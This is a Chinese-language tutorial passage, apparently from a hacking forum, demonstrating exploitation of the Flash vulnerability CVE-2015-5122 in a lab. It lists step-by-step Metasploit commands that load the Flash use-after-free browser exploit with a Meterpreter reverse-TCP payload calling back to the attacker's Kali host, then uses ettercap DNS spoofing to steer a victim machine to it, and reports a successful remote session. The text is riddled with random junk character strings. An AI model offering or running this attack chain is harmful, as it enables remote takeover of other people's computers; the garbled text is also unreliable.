: p$ K5 y" E7 Q# |- n# Y 二、cve2015-5122漏洞实例演示虚拟机 2 j; j; X, Q: T* ~# q7 [+ g, i
9 [, ]" t |: N4 b7 H5 O6 p1 C0 d9 |
# T+ ?* }" o! ^: v# u 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
) e& j; ?# K. _ q1 l " t2 Q4 g( N; X: C+ f+ y( g) V
9 x B6 y0 r# P! f8 x
search cve-2015-5122如图:
7 d$ \" k5 x- V9 h
# ]8 R, b2 E8 ]- Y5 c+ K$ ]4 x- Y" v! I; s1 V
% r t9 ]( o) C3 g- j+ L
% v- U) g0 j; y, @3 c" k# s5 r: ]. _4 E8 c0 e8 {5 M
下面我们敲如下命令: 9 V; N+ ]1 S7 K4 _+ c
& o0 F( j8 N( i( N, u5 l2 @! q3 E) x0 \! J+ { r& A
use exploit/multi/browser/adobe_flash_opaque_background_uaf % s5 r% b1 M. l& H* \! O
) Q4 n3 e1 u# p) A
. Q/ e& m( y+ ~9 ^5 ~( |( Y set PAYLOAD windows/meterpreter/reverse_tcp
3 H% s& V* Y4 o! S. u' g
3 [, e& n0 p/ V7 s. j+ \8 _3 E) C- s7 w+ I! B0 I
set LHOST 192.168.0.109
* G2 U y( f [6 x9 m + U8 b& i, B2 G) I' Y
) l1 B- B* Z5 m% K
set URIPATH / /*根目录*/ ; ^! |* Q3 [! F% T8 m8 O/ x3 r
( C+ Z& R5 d; R1 x* {( D' l [
* \, J# Q8 k+ A set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
9 I5 w% j1 Y: k' X' O$ K
0 D- ~$ O! s( c$ u7 ^( ?% |+ V2 b9 T
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
' }" G, s4 g0 `9 y/ i8 Y h
; N# f% l- l& i! I6 d. h) \4 `0 x: J2 s# u( `
然后show options如图: ) m; T7 J% Z0 ^% W4 G/ Q
! f0 y. Y! |, i1 W( Y$ _3 s3 C
& g0 d2 g3 q2 o. W % e# @* Y1 I, d, X2 r
, S/ A7 _/ J" P6 x) A! y
( Z" B. e9 I9 i2 B4 x; r: g 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
[8 g& k/ V/ e' H. \ h4 v/ {) m1 E/ Q5 W; \: y3 ]# C
6 W9 i2 O) j1 i& q/ U6 h$ l# V
* n9 B1 {. m6 ]5 C 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
( ~/ i& O# P" S/ G; ~
. r! C5 X/ t+ ] s) e$ u
# ~2 m4 I* ~/ ~2 V' ~ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf - `8 e4 E- l4 k" u: n. `* N
7 ?7 P& A6 T' ~9 b* u
, t7 N. d* D1 |& M- c, `2 q
. j; w7 J5 B" r0 H( j
: d i' X& v' h5 j! L: D \" G9 o) W: m5 r: e! A0 X; b% w! v
成功了,这时候我们断开ettercap,如图:
: d3 J5 `" I; a- m- M, A( F 9 j/ H5 ~' G, r7 r) u
0 w* K" {: E+ j1 m8 B3 B# `& v
; \, f, l+ Y! H! c- [8 X4 B9 U
1 a! [ a2 N6 a" f5 k$ ]7 n+ ~/ o( C7 a! C& Y4 l% K7 O
Screenshot如图: ( U" J' D' S! C& \: D/ y
$ y9 L$ z/ Y; x7 Z) [
/ ]* e4 j; o2 z; X1 J
/ R/ E5 f) G3 r0 { : U5 j, Z5 f* q6 b: J- K
7 w; D" c- u" }9 c0 Y/ G" t
' Z# m$ t8 t) f7 E( F |